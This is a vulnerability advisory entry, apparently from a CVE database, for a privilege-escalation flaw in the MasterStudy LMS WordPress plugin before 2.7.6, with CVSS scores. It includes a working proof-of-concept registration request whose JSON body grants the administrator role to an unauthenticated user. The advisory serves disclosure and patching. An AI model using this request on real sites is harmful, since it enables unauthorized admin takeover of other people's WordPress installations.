9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
The plugin does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
The nonce value of the stm_lms_register request must be retrieved from the ajax page. for this you should check the home page POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce;=[NONCE] HTTP/1.1 Connection: close Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Content-Type: application/json Content-Length: 339 {βuser_loginβ:βUSERNAMEβ,βuser_emailβ:βEMAIL@TLDβ,βuser_passwordβ:βPASSWORDβ,βuser_password_reβ:βPASSWORDβ,βbecome_instructorβ:ββ,βprivacy_policyβ:true,βdegreeβ:ββ,βexpertizeβ:ββ,βauditoryβ:ββ,βadditionalβ:[],βadditional_instructorsβ:[],βprofile_default_fields_for_registerβ:{βwp_capabilitiesβ:{βvalueβ:{βadministratorβ:1}}}} https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6 https://www.youtube.com/watch?v=SI_O6CHXMZk
CPE | Name | Operator | Version |
---|---|---|---|
masterstudy-lms-learning-management-system | lt | 2.7.6 |
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P